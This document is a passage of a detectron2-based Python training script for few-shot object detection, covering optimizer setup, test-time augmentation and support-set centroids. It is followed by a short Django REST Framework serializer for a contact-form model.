                    continue
                # Avoid duplicating parameters
                if value in memo:
                    continue
                memo.add(value)
                lr = cfg.SOLVER.BASE_LR
                weight_decay = cfg.SOLVER.WEIGHT_DECAY
                optimizer_name = "SGD"
                if isinstance(module, norm_module_types):
                    weight_decay = cfg.SOLVER.WEIGHT_DECAY_NORM
                elif key == "bias":
                    # NOTE: unlike Detectron v1, we now default BIAS_LR_FACTOR to 1.0
                    # and WEIGHT_DECAY_BIAS to WEIGHT_DECAY so that bias optimizer
                    # hyperparameters are by default exactly the same as for regular
                    # weights.
                    lr = cfg.SOLVER.BASE_LR * cfg.SOLVER.BIAS_LR_FACTOR
                    weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
                if "bottom_up" in name:
                    lr = lr * cfg.SOLVER.BOTTOM_UP_MULTIPLIER
                elif "transformer" in name:
                    lr = lr * cfg.SOLVER.TRANSFORMER_MULTIPLIER
                    optimizer_name = "ADAMW"
                params += [{"params": [value], "lr": lr, "weight_decay": weight_decay, "optimizer": optimizer_name}]
        optimizer_type = cfg.SOLVER.OPTIMIZER
        if optimizer_type == "SGD":
            optimizer = torch.optim.SGD(params, cfg.SOLVER.BASE_LR, momentum=cfg.SOLVER.MOMENTUM)
        elif optimizer_type == "ADAMW":
            optimizer = torch.optim.AdamW(params, cfg.SOLVER.BASE_LR)
        elif optimizer_type == "HYBRID":
            optimizer = HybridOptimizer(params, cfg.SOLVER.BASE_LR, momentum=cfg.SOLVER.MOMENTUM)
        else:
            raise NotImplementedError(f"no optimizer type {optimizer_type}")
        # "full_model" clipping is done manually in run_step(); any other
        # clip type is delegated to detectron2's wrapper here.
        if not cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == "full_model":
            optimizer = maybe_add_gradient_clipping(cfg, optimizer)
        return optimizer
    @classmethod
    def build_train_loader(cls, cfg):
        # DETR-style crop augmentation only when cropping is enabled;
        # otherwise fall back to detectron2's default mapper.
        if cfg.INPUT.CROP.ENABLED:
            mapper = DetrDatasetMapper(cfg, True)
        else:
            mapper = None
        return build_detection_train_loader(cfg, mapper=mapper)
    @classmethod
    def test_with_TTA(cls, cfg, model):
        # Evaluate with test-time augmentation; metric keys get a "_TTA"
        # suffix so they don't collide with the plain test results.
        logger = logging.getLogger("detectron2.trainer")
        # In the end of training, run an evaluation with TTA
        # Only support some R-CNN models.
        logger.info("Running inference with test-time augmentation ...")
        model = MyGeneralizedRCNNWithTTA(cfg, model)
        evaluators = [
            cls.build_evaluator(
                cfg, name, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA")
            )
            for name in cfg.DATASETS.TEST
        ]
        res = cls.test(cfg, model, evaluators)
        res = OrderedDict({k + "_TTA": v for k, v in res.items()})
        return res
    def initialize_from_support(trainer_self):
        # Few-shot helper: run the support set through the model and
        # collect per-class mean box features ("centroids").
        # NOTE(review): the centroids are computed and printed but never
        # written into cls_score weights here -- confirm this is intended.
        class_means = defaultdict(list)
        class_activations = defaultdict(list)
        print('Computing support set centroids')
        # Make sure this doesn't break on multigpu
        # Disable default Collate function
        support_loader = torch.utils.data.DataLoader(trainer_self.data_loader.dataset.dataset, batch_size=trainer_self.data_loader.batch_size, shuffle=False, num_workers=4, collate_fn=lambda x:x)
        with EventStorage() as storage:
            for i, batched_inputs in enumerate(support_loader):
                #for i, batched_inputs in enumerate(trainer_self.data_loader):
                print('Processed {} batches'.format(i))
                # `self` is deliberately rebound to the wrapped model so the
                # following lines mirror GeneralizedRCNN.forward internals.
                self = trainer_self.model
                images = self.preprocess_image(batched_inputs)
                gt_instances = [x["instances"].to(self.device) for x in batched_inputs]
                features = self.backbone(images.tensor)
                proposals, proposal_losses = self.proposal_generator(images, features, gt_instances)
                proposals = self.roi_heads.label_and_sample_proposals(proposals, gt_instances)
                # Average box deatures here
                gt_as_proposals = append_gt_as_proposal(gt_instances)
                losses, box_features = self.roi_heads._forward_box(features, gt_as_proposals, gt_instances, return_box_features=True)
                # box_features rows line up with the flattened gt boxes.
                box_features_idx = 0
                for instances in gt_as_proposals:
                    for gt_class in instances.gt_classes:
                        category_id = gt_class.item()
                        activation = box_features[box_features_idx]
                        class_activations[category_id].append(activation.detach().cpu())
                        box_features_idx += 1
        for category_id in class_activations:
            class_activations[category_id] = torch.stack(class_activations[category_id])
            class_means[category_id] = class_activations[category_id].mean(dim=0)
            print('Category: #{}, shape: {}'.format(category_id, class_activations[category_id].size()))
        pass
class MyGeneralizedRCNNWithTTA(GeneralizedRCNNWithTTA):
    """GeneralizedRCNNWithTTA variant whose detection merging honors this
    project's TTA thresholds and optional soft-NMS settings."""
    def __init__(self, cfg, model, tta_mapper=None, batch_size=3):
        """
        Args:
            cfg (CfgNode):
            model (GeneralizedRCNN): a GeneralizedRCNN to apply TTA on.
            tta_mapper (callable): takes a dataset dict and returns a list of
                augmented versions of the dataset dict. Defaults to
                `DatasetMapperTTA(cfg)`.
            batch_size (int): batch the augmented images into this batch size for inference.
        """
        super().__init__(cfg, model, tta_mapper, batch_size)
        # NOTE(review): the super().__init__ call above already performs
        # the unwrapping/assignments repeated below -- the duplication is
        # preserved as-is; confirm before simplifying.
        if isinstance(model, DistributedDataParallel):
            model = model.module
        assert isinstance(
            model, GeneralizedRCNN
        ), "TTA is only supported on GeneralizedRCNN. Got a model of type {}".format(type(model))
        self.cfg = cfg.clone()
        assert not self.cfg.MODEL.KEYPOINT_ON, "TTA for keypoint is not supported yet"
        assert (
            not self.cfg.MODEL.LOAD_PROPOSALS
        ), "TTA for pre-computed proposals is not supported yet"
        self.model = model
        if tta_mapper is None:
            tta_mapper = DatasetMapperTTA(cfg)
        self.tta_mapper = tta_mapper
        self.batch_size = batch_size
    def _merge_detections(self, all_boxes, all_scores, all_classes, shape_hw):
        # select from the union of all results
        num_boxes = len(all_boxes)
        num_classes = self.cfg.MODEL.ROI_HEADS.NUM_CLASSES
        # +1 because fast_rcnn_inference expects background scores as well
        all_scores_2d = torch.zeros(num_boxes, num_classes + 1, device=all_boxes.device)
        # Scatter each box's single class score into a dense score matrix.
        for idx, cls, score in zip(count(), all_classes, all_scores):
            all_scores_2d[idx, cls] = score
        # Run the project's single-image inference (supports soft-NMS)
        # with the TTA-specific thresholds from the config.
        merged_instances, _ = fast_rcnn_inference_single_image(
            all_boxes,
            all_scores_2d,
            shape_hw,
            self.cfg.MODEL.ROI_HEADS.TTA_SCORE_THRESH_TEST,
            self.cfg.MODEL.ROI_HEADS.TTA_NMS_THRESH_TEST,
            self.cfg.TEST.DETECTIONS_PER_IMAGE,
            self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_ENABLED,
            self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_METHOD,
            self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_SIGMA,
            self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_PRUNE,
        )
        return merged_instances
def setup(args):
    """
    Create configs and perform basic setups.
    """
    cfg = get_cfg()
    # Project-specific config keys must be registered before merging the
    # config file, otherwise merge_from_file rejects unknown keys.
    add_troi_config(cfg)
    add_fcos_config(cfg)
    cfg.merge_from_file(args.config_file)
    cfg.merge_from_list(args.opts)
    cfg.freeze()
    # Standard detectron2 bootstrapping: logger, output dir, env dump.
    default_setup(cfg, args)
    return cfg
def main(args):
    """Entry point for one (possibly distributed) worker process.

    Builds the config, seeds all RNG sources for reproducibility, then
    either evaluates a checkpoint (--eval-only) or trains, optionally
    re-initializing the box predictor for few-shot fine-tuning.
    """
    cfg = setup(args)
    # Seed every RNG source so runs are reproducible.
    os.environ['PYTHONHASHSEED'] = str(cfg.SEED)
    torch.manual_seed(cfg.SEED)
    torch.cuda.manual_seed_all(cfg.SEED)
    torch.backends.cudnn.deterministic = True
    print("Random Seed:", cfg.SEED)
    if args.eval_only:
        model = Trainer.build_model(cfg)
        AdetCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(
            cfg.MODEL.WEIGHTS, resume=args.resume
        )
        res = Trainer.test(cfg, model)
        if cfg.TEST.AUG.ENABLED:
            res.update(Trainer.test_with_TTA(cfg, model))
        return res
    trainer = Trainer(cfg)
    trainer.resume_or_load(resume=args.resume)
    # Few-shot: reset the output box predictor (only when not resuming).
    if cfg.MODEL.REINITIALIZE_BOX_PREDICTOR:
        # Idiomatic truthiness check (was `args.resume == False`).
        assert not args.resume, "few-shot does not support resuming"
        print('Reinitializing output box predictor')
        trainer.model.roi_heads.box_predictor.cls_score.reset_parameters()
        trainer.model.roi_heads.box_predictor.bbox_pred.layers[-1].reset_parameters()
        # Few-shot: initialize cls_score weights to average of support set
        trainer.initialize_from_support()
    return trainer.train()
if __name__ == "__main__":
    args = default_argument_parser().parse_args()
    print("Command Line Args:", args)
    # launch() spawns one process per GPU and calls main(args) in each.
    launch(
        main,
        args.num_gpus,
        num_machines=args.num_machines,
        machine_rank=args.machine_rank,
        dist_url=args.dist_url,
        args=(args,),
    )
|
from rest_framework import serializers
from frontend.models import Frontend
class FrontendSerializer(serializers.ModelSerializer):
    """DRF serializer exposing the contact fields of the Frontend model."""
    class Meta:
        model = Frontend
        # Only the contact-form fields are exposed, not the whole model.
        fields = ('title' , 'email','message')
        # fields = '__all__'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.